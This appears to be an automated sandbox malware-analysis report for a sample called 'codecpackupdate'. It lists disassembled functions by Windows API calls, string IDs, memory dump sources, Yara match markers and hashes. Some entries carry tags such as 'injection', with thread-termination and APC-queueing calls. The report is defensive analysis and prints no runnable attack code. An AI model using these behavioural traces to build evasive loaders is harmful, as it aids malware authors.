                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CriticalSection$AddressCompareEnterErrorExchangeH_prologHandleInterlockedLastLeaveModuleProc
                                                                          • String ID: CancelIoEx$KERNEL32
                                                                          • API String ID: 2902213904-434325024
                                                                          • Opcode ID: 2913399f54ae82b49cba1bc21a575ca9dc5673006b700d1888d3301fb386c77a
                                                                          • Instruction ID: 3093710ff5725cf828bd612bc3c60b4f79e11c91880fe3ccf2475ef90a516563
                                                                          • Opcode Fuzzy Hash: 2913399f54ae82b49cba1bc21a575ca9dc5673006b700d1888d3301fb386c77a
                                                                          • Instruction Fuzzy Hash: 7F319CB1900319DFCB01EFA4C984AAEBBF8FF49311F008469F9199B251C778DA01CBA1
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405857 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 50libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNEL32(user32.dll,?,00000000,?,00404D1D,?,Microsoft Visual C++ Runtime Library,00012010,?,00406530,?,00406580,?,?,?,Runtime Error!Program: ), ref: 00405869
                                                                          • GetProcAddress.KERNEL32(00000000,MessageBoxA), ref: 00405881
                                                                          • GetProcAddress.KERNEL32(00000000,GetActiveWindow), ref: 00405892
                                                                          • GetProcAddress.KERNEL32(00000000,GetLastActivePopup), ref: 0040589F
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$LibraryLoad
                                                                          • String ID: GetActiveWindow$GetLastActivePopup$MessageBoxA$user32.dll
                                                                          • API String ID: 2238633743-4044615076
                                                                          • Opcode ID: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction ID: 8e14f7a6750b1570260f033f2342e22bcd7c780a38ad1719db35514165c9b09a
                                                                          • Opcode Fuzzy Hash: a1fdb014e8dea29639177d20d343b616e560619fb48a784863710210177faac4
                                                                          • Instruction Fuzzy Hash: 9F015232600701AFDB11EFB5AD80A1B3BE8EB45740315043AB909F2591D678D8359F69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405B1F Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LCMapStringW.KERNEL32(00000000,00000100,004065FC,00000001,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405B61
                                                                          • LCMapStringA.KERNEL32(00000000,00000100,004065F8,00000001,00000000,00000000,?,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405B7D
                                                                          • LCMapStringA.KERNEL32(00000000,?,00000000,00200020,00404E93,?,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BC6
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,00200020,00000000,00000000,00000103,00000001,00000000,?,00404E93,00200020,00000000,?,00000000,00000000), ref: 00405BFE
                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00200020,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C56
                                                                          • LCMapStringW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405C6C
                                                                          • LCMapStringW.KERNEL32(00000000,?,00404E93,00000000,00404E93,?,?,00404E93,00200020,00000000,?,00000000), ref: 00405C9F
                                                                          • LCMapStringW.KERNEL32(00000000,?,?,?,?,00000000,?,00404E93,00200020,00000000,?,00000000), ref: 00405D07
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: String$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 352835431-0
                                                                          • Opcode ID: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction ID: 228655485731442308ac41690fb54a5bf4aece3cc6a962a44786cceaeb1d8e11
                                                                          • Opcode Fuzzy Hash: 585e295b11037126dfcd064dc94fe4f66704bff1de9b4c7a404ff84c747eed69
                                                                          • Instruction Fuzzy Hash: 94518931504609AFDF228F55CD45EAF7FB9EB48744F20412AF912B12A0D3398D21DF69
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404BF9 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000), ref: 00404C66
                                                                          • GetStdHandle.KERNEL32(000000F4,00406530,00000000,?,00000000,00000000), ref: 00404D3C
                                                                          • WriteFile.KERNEL32(00000000), ref: 00404D43
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: File$HandleModuleNameWrite
                                                                          • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                          • API String ID: 3784150691-4022980321
                                                                          • Opcode ID: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction ID: f140c2e8ca9dd112070b7b1a63e93dd9695d020ae797257d07982e8dddccbb03
                                                                          • Opcode Fuzzy Hash: b6dd7ce0089c197cf693ca265a150b89f405fd2be0e3a5b5ca2c0cc9865f6c54
                                                                          • Instruction Fuzzy Hash: 5531E5B2A012186FEF20E760DE49FDA336CEF85304F1005BBF945B61D0D6B89E548A19
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00404710 Relevance: 12.1, APIs: 8, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040472B
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040473F
                                                                          • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 0040476B
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047A3
                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047C5
                                                                          • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00402FA6), ref: 004047DE
                                                                          • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00402FA6), ref: 004047F1
                                                                          • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0040482F
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                                                          • String ID:
                                                                          • API String ID: 1823725401-0
                                                                          • Opcode ID: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction ID: 34ba4f5269201e1e594d4a21fe80140370f79d481ab45775fabf70a7e665ef6c
                                                                          • Opcode Fuzzy Hash: 3561de5b01a372d6e215d3622bd3220d2b84138c13fabd42e705c73002b4d0d2
                                                                          • Instruction Fuzzy Hash: E631C2F75042656FD7207FB99D8483BB69CE6C6358716093BFB42F3280D7798C4182AA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01550 Relevance: 10.6, APIs: 7, Instructions: 132COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A01605
                                                                          • ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
                                                                          • CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,35B6412D), ref: 00A016BA
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A016CF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CloseEventHandle$CreateOpenReset
                                                                          • String ID:
                                                                          • API String ID: 1285874450-0
                                                                          • Opcode ID: a16bf58e775abc246a528a1f3645127b2d31711805e3ca5ebc1f5cf0ba5a59ea
                                                                          • Instruction ID: b7feb1f5d26a83795396475213955868c9da5ad5b48f35c8228ccb61b7158648
                                                                          • Opcode Fuzzy Hash: a16bf58e775abc246a528a1f3645127b2d31711805e3ca5ebc1f5cf0ba5a59ea
                                                                          • Instruction Fuzzy Hash: 1D412C71D0435CABDF21CFA5DD84BEEBBB8AB05724F144219E819AB2C1D7719905CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F2081 Relevance: 10.6, APIs: 7, Instructions: 116timeCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 009F20AC
                                                                          • SetWaitableTimer.KERNEL32(00000000,?,00000001,00000000,00000000,00000000), ref: 009F20CD
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F20D8
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 009F213E
                                                                          • GetQueuedCompletionStatus.KERNEL32(?,?,?,?,000001F4,?), ref: 009F217A
                                                                          • InterlockedDecrement.KERNEL32(?), ref: 009F2187
                                                                          • InterlockedExchangeAdd.KERNEL32(?,00000000), ref: 009F21A6
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Interlocked$Exchange$Decrement$CompletionQueuedStatusTimerWaitable
                                                                          • String ID:
                                                                          • API String ID: 1171374749-0
                                                                          • Opcode ID: 0bfa594cc17542cc7bb13588c7c71204a29f49f95be937485b39a493a555da76
                                                                          • Instruction ID: 8e6498f98fcf493d178d7c0fec3c526ae44a248fe83ad90ab089f59c3b1af1b1
                                                                          • Opcode Fuzzy Hash: 0bfa594cc17542cc7bb13588c7c71204a29f49f95be937485b39a493a555da76
                                                                          • Instruction Fuzzy Hash: 81415B715087059FC311DF65D885A6BBBF9FFC8750F044A1EF59682250DB30E906CBA6
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01662 Relevance: 10.6, APIs: 7, Instructions: 107synchronizationCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                            • Part of subcall function 00A01E10: OpenEventA.KERNEL32(00100002,00000000,?,?,?,00A0166E,?,?), ref: 00A01E3F
                                                                            • Part of subcall function 00A01E10: CloseHandle.KERNEL32(00000000,?,?,00A0166E,?,?), ref: 00A01E54
                                                                            • Part of subcall function 00A01E10: SetEvent.KERNEL32(00000000,00A0166E,?,?), ref: 00A01E67
                                                                          • OpenEventA.KERNEL32(00100002,00000000,00000000,35B6412D), ref: 00A015F0
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A01605
                                                                          • ResetEvent.KERNEL32(00000000,35B6412D), ref: 00A0160F
                                                                          • CloseHandle.KERNEL32(00000000,35B6412D), ref: 00A01644
                                                                          • __CxxThrowException@8.LIBCMT ref: 00A01675
                                                                            • Part of subcall function 00A0449A: RaiseException.KERNEL32(?,?,009FFA92,?,?,?,?,?,?,?,009FFA92,?,00A20F78,?), ref: 00A044EF
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,35B6412D), ref: 00A016BA
                                                                          • CloseHandle.KERNEL32(00000000), ref: 00A016CF
                                                                            • Part of subcall function 00A01B50: GetCurrentProcessId.KERNEL32(?), ref: 00A01BA9
                                                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,35B6412D), ref: 00A016DF
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Event$CloseHandle$Open$CreateCurrentExceptionException@8ObjectProcessRaiseResetSingleThrowWait
                                                                          • String ID:
                                                                          • API String ID: 2227236058-0
                                                                          • Opcode ID: 1c643fdc53387f76089f0bea272235a900bb8fa892d7f0acd0072e41d120381d
                                                                          • Instruction ID: 207df51d07f2903d051ae77b415bf30270a0dc372a206434ce0646d7059474a0
                                                                          • Opcode Fuzzy Hash: 1c643fdc53387f76089f0bea272235a900bb8fa892d7f0acd0072e41d120381d
                                                                          • Instruction Fuzzy Hash: FA314C71D0435CABDF21DBE4EC85BEDB7B8AF05315F184219E819EB2C1E722A9058B51
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A05CD4 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • __init_pointers.LIBCMT ref: 00A05CD4
                                                                            • Part of subcall function 00A08442: RtlEncodePointer.NTDLL(00000000), ref: 00A08445
                                                                            • Part of subcall function 00A08442: __initp_misc_winsig.LIBCMT ref: 00A08460
                                                                            • Part of subcall function 00A08442: GetModuleHandleW.KERNEL32(kernel32.dll,?,00A21578,00000008,00000003,00A20F5C,?,00000001), ref: 00A091C1
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 00A091D5
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00A091E8
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00A091FB
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00A0920E
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00A09221
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00A09234
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00A09247
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00A0925A
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00A0926D
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00A09280
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00A09293
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00A092A6
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00A092B9
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00A092CC
                                                                            • Part of subcall function 00A08442: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00A092DF
                                                                          • __mtinitlocks.LIBCMT ref: 00A05CD9
                                                                          • __mtterm.LIBCMT ref: 00A05CE2
                                                                            • Part of subcall function 00A05D4A: RtlDeleteCriticalSection.NTDLL(00000000), ref: 00A08878
                                                                            • Part of subcall function 00A05D4A: _free.LIBCMT ref: 00A0887F
                                                                            • Part of subcall function 00A05D4A: RtlDeleteCriticalSection.NTDLL(00A23978), ref: 00A088A1
                                                                          • __calloc_crt.LIBCMT ref: 00A05D07
                                                                          • __initptd.LIBCMT ref: 00A05D29
                                                                          • GetCurrentThreadId.KERNEL32 ref: 00A05D30
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                          • String ID:
                                                                          • API String ID: 3567560977-0
                                                                          • Opcode ID: 4757c06a70b5e510f948b6c630bda60a8a0f7c3707e468959617c6f626d8b03a
                                                                          • Instruction ID: 1240caf5324f7a97a03f55e3b9033cef11d5cdfc260e9be72f96d7a1b3f4643a
                                                                          • Opcode Fuzzy Hash: 4757c06a70b5e510f948b6c630bda60a8a0f7c3707e468959617c6f626d8b03a
                                                                          • Instruction Fuzzy Hash: 67F0BB32959B191FE674B7B97E0B65B2784DF01770B200A1AF455C90D1FF198C424D55
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A03404 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 24libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize,?,00A033B6,00000000), ref: 00A0341E
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00A03425
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00A03431
                                                                          • RtlDecodePointer.NTDLL(00000001), ref: 00A0344E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoInitialize$combase.dll
                                                                          • API String ID: 3489934621-340411864
                                                                          • Opcode ID: 723ec0efad399e08f2292c87da9f8fe8d038ae16efa26416b9c1bc963c9e0963
                                                                          • Instruction ID: f7a79b5ae40f4cebbf463811c4019ef4e3498e1b35f25ed3a15ef02bcde58af0
                                                                          • Opcode Fuzzy Hash: 723ec0efad399e08f2292c87da9f8fe8d038ae16efa26416b9c1bc963c9e0963
                                                                          • Instruction Fuzzy Hash: 4EE0E570AA9304FADA209FB8AC49FAA367AB700B47F40D570B106D51F0CAB946979B10
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A034D9 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00A033F3), ref: 00A034F3
                                                                          • GetProcAddress.KERNEL32(00000000), ref: 00A034FA
                                                                          • RtlEncodePointer.NTDLL(00000000), ref: 00A03505
                                                                          • RtlDecodePointer.NTDLL(00A033F3), ref: 00A03520
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                          • String ID: RoUninitialize$combase.dll
                                                                          • API String ID: 3489934621-2819208100
                                                                          • Opcode ID: e3e62412b5dc2c13d24dcf883228bf3b4031eac79fae0208c73ee2a24bdd1e3d
                                                                          • Instruction ID: d29b8691d32f454b9f24b58925c2e40393158b16f3adb3c895b6960365efdab8
                                                                          • Opcode Fuzzy Hash: e3e62412b5dc2c13d24dcf883228bf3b4031eac79fae0208c73ee2a24bdd1e3d
                                                                          • Instruction Fuzzy Hash: 24E0927059A304BBDA309FE4AC09F9A3A79F714702F109524FA06A12B0CBB856429A14
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A01E70 Relevance: 10.2, APIs: 8, Instructions: 154memoryCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • TlsGetValue.KERNEL32(00000025,35B6412D,?,?,?,?,00000000,00A169F8,000000FF,00A0210A), ref: 00A01EAA
                                                                          • TlsSetValue.KERNEL32(00000025,00A0210A,?,?,00000000), ref: 00A01F17
                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00A01F41
                                                                          • HeapFree.KERNEL32(00000000), ref: 00A01F44
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: HeapValue$FreeProcess
                                                                          • String ID:
                                                                          • API String ID: 1812714009-0
                                                                          • Opcode ID: 6a5672e674274c5126c8cb629383672b500799f2e942ee5d1031b46bd5d54ac2
                                                                          • Instruction ID: 85097f9296792a2e186c23b782960728d9941bf6acc5c3d5c918d3c5978cdd62
                                                                          • Opcode Fuzzy Hash: 6a5672e674274c5126c8cb629383672b500799f2e942ee5d1031b46bd5d54ac2
                                                                          • Instruction Fuzzy Hash: 2651BF316043099FC720DF68E888FAABBF4FB49764F058669F859972D0D730AC01CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00A155C0 Relevance: 9.3, APIs: 6, Instructions: 276COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • _ValidateScopeTableHandlers.LIBCMT ref: 00A156D0
                                                                          • __FindPESection.LIBCMT ref: 00A156EA
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FindHandlersScopeSectionTableValidate
                                                                          • String ID:
                                                                          • API String ID: 876702719-0
                                                                          • Opcode ID: 7f9e4a4991c6b06ec3bbadc81c6e7dc1117e8d5d3b3382208bd01729809b35fb
                                                                          • Instruction ID: 2071d0c0a688222eb6f9e87e9b1443c372e41b3f07cd60ed4c933ac0f838a1d5
                                                                          • Opcode Fuzzy Hash: 7f9e4a4991c6b06ec3bbadc81c6e7dc1117e8d5d3b3382208bd01729809b35fb
                                                                          • Instruction Fuzzy Hash: 79A1AE75E04A15CFCB24CF68D981AEDB7E5FB84320F184669EC15AB291E731ED81CB90
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00405D6E Relevance: 9.1, APIs: 6, Instructions: 117COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetStringTypeW.KERNEL32(00000001,004065FC,00000001,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DAD
                                                                          • GetStringTypeA.KERNEL32(00000000,00000001,004065F8,00000001,?,?,00000000,00000000,00000001), ref: 00405DC7
                                                                          • GetStringTypeA.KERNEL32(00000000,00000000,?,00000000,00200020,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405DFB
                                                                          • MultiByteToWideChar.KERNEL32(00404E93,00000002,?,00000000,00000000,00000000,00000103,00000001,00000000,00404E93,00200020,00000000,?,00000000,00000000,00000001), ref: 00405E33
                                                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E89
                                                                          • GetStringTypeW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00405E9B
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: StringType$ByteCharMultiWide
                                                                          • String ID:
                                                                          • API String ID: 3852931651-0
                                                                          • Opcode ID: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction ID: 80e02ee10c910d5558e83bb499fc0990029bfad3b9a08e1f349c60d3d592f295
                                                                          • Opcode Fuzzy Hash: 299ca15397ebee838ff06567ddbc0ab6f29b8118cf23d418261883c500b25a22
                                                                          • Instruction Fuzzy Hash: D5416C72540619AFCF109FA4DD85AAF3F69FB08710F10443AF912F6290C3399A619BA9
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 009F1C91 Relevance: 9.0, APIs: 6, Instructions: 39synchronizationthreadinjectionCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 009F1CB1
                                                                          • CloseHandle.KERNEL32(?), ref: 009F1CBA
                                                                          • InterlockedExchangeAdd.KERNEL32(00A27244,00000000), ref: 009F1CC6
                                                                          • TerminateThread.KERNEL32(?,00000000), ref: 009F1CD4
                                                                          • QueueUserAPC.KERNEL32(009F1E7C,?,00000000), ref: 009F1CE1
                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 009F1CEC
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2868320795.00000000009F1000.00000040.00001000.00020000.00000000.sdmp, Offset: 009F1000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_9f1000_codecpackupdate.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Wait$CloseExchangeHandleInterlockedMultipleObjectObjectsQueueSingleTerminateThreadUser
                                                                          • String ID:
                                                                          • API String ID: 1946104331-0
                                                                          • Opcode ID: 17ab6e982b01fb5fc7d339ac65c5f144fdbb0ab0d82a409c6d75b317ae9c3596
                                                                          • Instruction ID: 44b94592436334ef4f3a1fcc73bf9929e8f45e106a5505623e9990e73a904077
                                                                          • Opcode Fuzzy Hash: 17ab6e982b01fb5fc7d339ac65c5f144fdbb0ab0d82a409c6d75b317ae9c3596
                                                                          • Instruction Fuzzy Hash: 87F03135144314FFD7109B95DD0DDABBBBCEB89721B00825DF669821A0DB7059018B60
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Function 00403112 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115COMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • GetVersionExA.KERNEL32 ref: 00403131
                                                                          • GetEnvironmentVariableA.KERNEL32(__MSVCRT_HEAP_SELECT,?,00001090), ref: 00403166
                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 004031C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2867652941.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000003.00000002.2867652941.0000000000409000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_400000_codecpackupdate.jbxd
                                                                          Similarity
                                                                          • API ID: EnvironmentFileModuleNameVariableVersion
                                                                          • String ID: __GLOBAL_HEAP_SELECTED$__MSVCRT_HEAP_SELECT
                                                                          • API String ID: 1385375860-4131005785
